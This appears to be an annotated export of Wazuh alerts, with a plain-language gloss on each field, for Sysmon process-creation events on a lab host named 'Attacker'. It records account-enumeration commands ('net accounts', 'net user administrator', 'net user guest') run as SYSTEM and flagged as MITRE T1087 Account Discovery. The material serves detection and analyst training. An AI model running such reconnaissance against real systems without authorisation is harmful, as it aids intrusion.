data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:43.2449488Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291053 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:43.238
ProcessGuid: {94294ddc-be63-680a-250c-000000000e00}
ProcessId: 12592
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be63-680a-230c-000000000e00}
ParentProcessId: 10588
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:43.238 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be63-680a-250c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12592 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be63-680a-230c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10588 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534570.2281048 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:43.2961799Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291056 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:43.290
ProcessGuid: {94294ddc-be63-680a-260c-000000000e00}
ProcessId: 16356
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net user administrator
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:43.290 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be63-680a-260c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16356 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 10 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534570.2286331 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:43.3953532Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291059 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:43.390
ProcessGuid: {94294ddc-be63-680a-280c-000000000e00}
ProcessId: 16124
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 user administrator
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be63-680a-260c-000000000e00}
ParentProcessId: 16356
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net user administrator
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:43.390 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be63-680a-280c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16124 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be63-680a-260c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16356 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 11 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534571.2291476 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:43.4548542Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291062 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:43.446
ProcessGuid: {94294ddc-be63-680a-290c-000000000e00}
ProcessId: 10860
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net user guest
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:43.446 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be63-680a-290c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10860 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net user guest No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 12 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534571.2296727 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:43.5556163Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291066 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:43.550
ProcessGuid: {94294ddc-be63-680a-2b0c-000000000e00}
ProcessId: 10252
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 user guest
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be63-680a-290c-000000000e00}
ParentProcessId: 10860
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net user guest
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:43.550 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be63-680a-2b0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10252 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 user guest No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be63-680a-290c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10860 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
